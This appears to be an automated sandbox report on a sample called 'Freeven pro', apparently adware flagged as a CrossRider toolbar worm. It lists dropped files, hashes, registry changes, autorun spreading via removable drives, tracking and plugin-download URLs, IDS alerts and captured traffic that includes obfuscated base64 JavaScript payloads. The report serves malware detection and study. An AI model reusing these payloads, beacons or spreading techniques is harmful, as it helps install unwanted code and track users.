The process Freeven pro-bg.exe:2444 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 9C 3D 98 A6 80 B8 26 7B 83 71 FD 8F 9F 9E 01"

Dropped PE files

MD5	File path
2392e63270923f75c15acc12e0bca68d	c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe
7acbb2626b7c3eb09c3a789fa4c643ef	c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe
8c926c9bddc514d51721810549931684	c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe
d800d4c37b42e60fa009f56dc8c1e55a	c:\Program Files\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe
20d685dac506106f6488f014475a4d4c	c:\Program Files\Freeven pro\Freeven pro-bg.exe
6feda0e61a6843511db89969f8485ed9	c:\Program Files\Freeven pro\Freeven pro-bho.dll
c0dc0684d8021439d22d7a553545d02b	c:\Program Files\Freeven pro\Freeven pro-codedownloader.exe
54cb1914f155ee7cb6309400ca3e81e5	c:\Program Files\Freeven pro\Uninstall.exe
323acc3f1ae4165d152a3673c07d6d95	c:\Program Files\Freeven pro\utils.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name: Tgeslexscrg
Product Name: Nwbgt
Product Version:
Legal Copyright: Axcqtl
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 23.25.18.22
File Description: Pfusuetjjzgt
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	34880	35328	4.15051	bb4ba76c16dfeef0912cc68f9edb1285
.data	40960	140	512	0.818128	a5a710a52d844b19513b2cab5693dbc3
.rdata	45056	9108	9216	4.0908	004265d16597098398ce8e06897dcd29
.bss	57344	252880	0	0	d41d8cd98f00b204e9800998ecf8427e
.idata	311296	4868	5120	3.64756	20f692042b54593897a705a64d67ce50
.ndata	319488	286720	8192	0	0829f71740aab1ab98b33eae21dee122
.rsrc	606208	17184	17408	4.12231	a7421e5fac485204160f3e6381e28702
.odata	626688	77824	77824	5.54121	708eea8efbddd2beddadb0a08e9db490

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/001360/update.json
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128
hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de
hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816
hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/42.js?ver=10&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/375.js?ver=1&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/281.js?ver=3&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/334.js?ver=1&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/260.js?ver=4&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/242.js?ver=4&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/230.js?ver=7&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/233.js?ver=7&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/221.js?ver=4&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=4&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/195.js?ver=28&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=38&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/7.js?ver=2&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/9.js?ver=3&rnd=8467
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/193.js?ver=9&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=12&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=135&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=3&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=13&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=6500
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=6334
hxxp://cds.d5k9g9i8.hwcdn.net/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163
hxxp://js.ourstatsstaticstack.com/plugins/mins/242.js?ver=4&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/260.js?ver=4&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/200.js?ver=4&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/375.js?ver=1&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/246.js?ver=17&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/334.js?ver=1&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/42.js?ver=10&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/220.js?ver=38&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/195.js?ver=28&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/354.js?ver=2&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/391.js?ver=1&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/376.js?ver=3&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/184.js?ver=11&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/281.js?ver=3&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/180.js?ver=12&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/390.js?ver=1&rnd=41	69.16.175.10
hxxp://stats.clientstaticserv.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128	54.231.2.124
hxxp://js.ourstatsstaticstack.com/plugins/mins/273.js?ver=6&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/9.js?ver=3&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/193.js?ver=9&rnd=6334	69.16.175.10
hxxp://update.clientstaticserv.com/installer_updates/001360/update.json	69.16.175.42
hxxp://js.ourstatsstaticstack.com/plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/7.js?ver=2&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/223.js?ver=9&rnd=8467	69.16.175.10
hxxp://stats.clientstaticserv.com/stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720	54.231.2.124
hxxp://js.ourstatsstaticstack.com/plugins/mins/221.js?ver=4&rnd=8467	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/380.js?ver=1&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/91.js?ver=135&rnd=6334	69.16.175.10
hxxp://stats.clientstaticserv.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163	54.231.2.124
hxxp://stats.clientstaticserv.com/apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270	54.231.2.124
hxxp://js.ourstatsstaticstack.com/plugins/mins/345.js?ver=13&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/288.js?ver=4&rnd=41	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/230.js?ver=7&rnd=8467	69.16.175.10
hxxp://js.clientstaticserv.com/plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677	69.16.175.10
hxxp://logs.clientstaticserv.com/monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de	69.16.175.42
hxxp://js.ourstatsstaticstack.com/plugins/mins/253.js?ver=2&rnd=6500	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/102.js?ver=15&rnd=6334	69.16.175.10
hxxp://js.ourstatsstaticstack.com/plugins/mins/233.js?ver=7&rnd=8467	69.16.175.10

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Win32/Toolbar.CrossRider.A Checkin

Traffic

GET /monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1

Host: logs.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:28:49 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1389114507"

Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT

Cache-Control: max-age=86400

Content-Length: 35

Content-Type: image/gif

X-HW: 1427668129.dop004.fr7.t,1427668129.cds021.fr7.c

GIF89a.............,...........D..;..

GET /stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720 HTTP/1.1

Accept: */*

Host: stats.clientstaticserv.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: bv7R7GvoHtkT6tZwDHTn5aGvv82bpoRuZfuwoQE7Y9eihDblVFiDgrF6TjNV4bMySYPxeldlZck=

x-amz-request-id: A00E4ABD3823A6B0

Date: Sun, 29 Mar 2015 22:29:11 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;..

GET /plugins/mins/375.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1423049332"

Last-Modified: Wed, 04 Feb 2015 11:28:52 GMT

Cache-Control: max-age=900

Content-Length: 679

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop003.fr7.t,1427668152.cds023.fr7.c

if (typeof setup2 === 'function') { setup2('MDE3MDc4NDMwMzFlMDUxMzJmMW
MxNjU4NGI0MTQ5MDIwNTE3MGE1NDU1NTUxODRmMDgxODE0MDExMDFkNTQxMzFmMDcwNDQ1
MTIxMTFmMGM1NTEwMTAxNzBhMTkxMjExMTMxZTBlNTQxYjEyNTQwOTE5MDIxNDAwMWYxNj
RjMDIxOTBlMDMzYzI1MzEzOTI4M2UzMjM4MzgzODI3M2YzYzI1M2YyOTM1MmUyNDM1MjYz
ZTMxMjkyZjMzM2UyMjJlMmUzYzU4NDI3MDczNTMwOTFmMWUwMTEwMmYxYzE2NTg0YjQxND
kwMjA1MTcwYTFkNDA1NTVlMDgzNDA5MDMwNjE4MDQwOTI1MTgwZjBkMDU1ZjE3MTYxZDE5
MWUxZjRmMDgwNTFjNGMxOTFjMWYxODVlMGIwYTFjMTAxMDE5MWMxMzBhMDU0ZjAxMTk0ZT
AwMTIwZjE0MTQxNDBkNTYwOTAzMDcwODMxMjUyNTMyMzMyNDM5MjIzMTMzMmEzZjI4MmUy
NDMzM2UzNDJkM2UyYjNlMjUyMjM0MjkzNTM4MjcyNTMxNTg1NjdiNjg0OTFhMWQxNjFkMD
cxNDMzMTU0MzUxNGE0MjU0NGY2NDA3', 'zzqakjqczn'); }....

GET /plugins/mins/390.js?ver=1&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1425996283"

Last-Modified: Tue, 10 Mar 2015 14:04:43 GMT

Cache-Control: max-age=900

Content-Length: 823

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop003.fr7.t,1427668152.cds025.fr7.c

if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMD
MxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBh
MGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNT
JlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0
MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMz
YyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIz
MTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNj
BlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2Uz
YjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMm
UyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4
MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMD
A4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }....

GET /plugins/mins/281.js?ver=3&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1423758037"

Last-Modified: Thu, 12 Feb 2015 16:20:37 GMT

Cache-Control: max-age=900

Content-Length: 455

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668152.dop003.fr7.t,1427668152.cds021.fr7.c

if (typeof setup2 === 'function') { setup2('MGE2YjdhNWIwMDE3MTAxMTJkMT
ExZDQzNDk1OTRhMGIxMDE1MDg1OTVlNGUxMDE1MDMwNzAxMDAxNDEwNWYwMjFjMTQ0NzAy
MDAzMjFkMTEwNzA0NWMxZTBkMTczMDAwMWY1YzAxMDgxNzQ0NTk1MjU0NTM0OTQ1MTIwOD
E3NDQzNzNjMjczMzM3MzAyMjMzM2EzZDJkMzEzYjI0MjAzNzM0MmYzNzNjMmMzYzM3MzQz
YTNjMzgyNTJjMjY0ZTAyMTQxMTM2MDIxYzA0NGUyNjM3MjAzNjJlMmIzMDIzMjgzNzNjM2
EzYzI1MzEyODNjM2YyMDNlM2MzNzNjNDY0ZDcyNmE1MzExMWYwYzBmMGEwYTI4MWM0MTRi
NDE0MTQxNTk2OTE5', 'qasyhcdaxc'); }....

GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1405263875"

Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT

Cache-Control: max-age=900

Content-Length: 823

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds034.fr7.c

if (typeof setup2 === 'function') { setup2('MGI3MDdiNTQwZDAwMTYxZjNkMW
YxYzU4NDg1NjQ3MWMxNjFiMTg1NzVmNTUwNTA1NGIwNDEwMDYwYjA4MTQxZjA2MTMwNjAw
NGMwYzA3MDA1ZjA5NWQwNjAxMWUxMTVhNWI1YjQyNGIxMzQ2NTM0NTU1MGI1YjA5NWUxMD
AxNDkxNjFkMDY1MjM3MzIzMzI4M2QyNTM2MjYyYjJiMmQzZjJmM2YyYTIyMjAzYTI2MmEy
YzMyMjMyZjMwMjkyYzMwM2QzMDRlMGMwMDBhMWMxNzA4MTE1ZjMwMzcyZTIyMzUyMTI1Mz
czZDI2MmEzYTMyMzEyYTIyMjkyYjM1MmYyYTM3MzI1MjU2Nzg3ZjQ3MWMxNjFiMTgxZTI1
MDgxZTU0NWY1NDQwMDcxYzE5MDAwOTQ4NTk0YTAzMTE0MTE4MWYxOTE5MTcxMjAwMDAwNz
BjMWM0MzEzMTUxZjU5MTY1YjEyMGIwMjFlNDU0OTQ0NDQ1NDE1NTI1OTU5NWExNDQ5MTY1
ODBmMDc1ZDFjMDEwOTRkMjUyZDM1MzczYjMxM2MzYTI0MzQzZjIwMjkyMDJjMzYyYTI2Mj
kzNTNlMmQyNTMwMzYzZDI2MmMzMjJmNWMxMzA2MTUxYTAzMDIwZDUwMmYyNTMxMjQyYTI3
MzEzZDIxMjkzNTI4MmQzNzM1MjQzZDIxMjkyMDM1MjUyZDU0NDk3ZTZiNGQxODAxMDUxZD
FiMTgyYzEwNDA1NTQ4NWY0NjRhNzgwYg==', 'pzrvetbohm'); }....

GET /plugins/mins/288.js?ver=4&rnd=41 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426880306"

Last-Modified: Fri, 20 Mar 2015 19:38:26 GMT

Cache-Control: max-age=900

Content-Length: 963

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds021.fr7.c

if (typeof setup2 === 'function') { setup2('MWU2NzVhNWE1NDQ1NTMxYjE5MT
cxNTM4MDgxNjU2NWY1MTUxMDUxNzExMWQ0MDU1NWIwYzAyMDcwYzE3MGMwZTU0MWYwNzBk
MWUwMzBlMGMwODFkNTQxOTFiMDg1ZTE1MDI0YzA4MDQxNDU1MTcxNzAwMTA0MzA5MTY1Mj
EyMTMxMDU4MmUyYzJlMzEyYTNlMjkyODNkMjEzNDIxMzIzNjM2MjgyODI1M2QyMTJlMmM0
YjAxMGIwYzE3MWY0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMmMzMzM1MzIzNDNiMz
kyMDJlMmM0YjEwMTAwZjEzMWU0OTNhMmUzMDNmMmMzNjNlMjgzMzMwMjAyMzJjMjgzYjMx
MjgzNDNlMzEyMTJlMjAzODIxM2EyNDNlMjUyYjQ3NWQ3OTRkNDM0NTRkNTgxMjAwMTEwMT
AwMzgxMTA5NGY0MDVhNTYwZDA1MDcxZDEwNWY0MjU1MTMwNzExMTAwNzA0MDA0YjA4MDkx
MjFiMTUxMjFjMDAxMzRiMGUxNTE3NWIwMzFlNWMwMDBhMGI0MjE5MDgwNTA2NWYxOTFlNW
MwZDA0MWU0NzJiM2EzMjIxMjIzMDM2M2YzMzNlMzEzNzJlMjYzZTI2MzczMjMzM2UyYjNh
NTcxMTAzMDIwODA4NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTMwMjMzZDNjMmIyYz
M3M2YyYjNhNTcwMDE4MDEwYzA5NDcyNTJiMjYyMzNjM2UzMDM3MjQzZTNmMjYzYTM0MmIz
OTI2MmIyOTNmM2UyYjM2MjQzMTMyMmEyMTMyMjU1ODU4NmY1MTUzNGQ0MzQ3MWQxNjBmMT
MwYzFmM2EwOTQxNWY0ZDQ4NDI0YzZmMGM=', 'emzzteqsmc'); }....

GET /plugins/mins/233.js?ver=7&rnd=8467 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: js.ourstatsstaticstack.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sun, 29 Mar 2015 22:29:12 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1408273128"

Last-Modified: Sun, 17 Aug 2014 10:58:48 GMT

Cache-Control: max-age=900

Content-Length: 867

Content-Type: application/x-javascript; charset=UTF-8

X-HW: 1427668153.dop003.fr7.t,1427668152.cds022.fr7.c

if (typeof setup2 === 'function') { setup2('MDE2NzdiNGMxZDEwMTIxZTM2MD
cxNjRmNDg0ZTU3MGMxMjFhMTM0ZjU1NDIxMzFkMDcxMjRiMGY0ZDE0MTEwYzFmMGYxYzBj
MDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNWIwZTE1NGM0ZjdmNzM0Zj
FhMWEwMTE0MTUzYjExMTk1ODU3NTI0YzFkMTAxMjFlMTA0ZjU1NDIxMzFkMDcxMjRiMGY0
ZDE0MTEwYzFmMGYxYzBjMDI0MDBkMTAwZTQyMDEwYTVhNTU1MTVlNTM1YTRiNWQ0NzVlNW
IwZTE1NGM0ZjdmNzM0ZjAyMDIwMDAzMGYwMDJhMTE1ODU3NTI1YzQ2NTc0YTY0NDM1NTVh
NGQ1MDE4MTAxNjEyMDcwMDE0MTY0ZjQ4NGUyZTQ2MDcwYTEwNTcyNzQxNzg0ZTU1NDQ0Nj
RjMGExYjE2MDQxYzBiM2YzNzQ0NTQ0MzU3MGQwNDFjMGExYTEzNDgzMTExMDMwMDVjNDU1
ZTQ1MWM1NzVlNTY0NTVhNTA1MjE1NTU0MzE2MWIwMTE5MTMxZTFhMGIwNzNiMTUxYjAxMW
MxZTRhNDg0ZTUyM2IzOTJkMzEzYTI5M2UyMDI3MzEyMTM0MzEyNjJkMmUyODNjMmEzMDIw
MzkzZDM2MzcyNTI0MzYzMTJhNDM0YTRlNDQxNDFlMDkxZDAwMWIwNTBiMGI0NDRmNWE0YT
JkMzEzNjM2MjkzZDMwMjczMzI5MzczYzJhMjUzNjNlM2MzYjNiMjAzNzMxMmE0MzFiNTU0
MTdmMDc=', 'zmrnudfncu'); }....

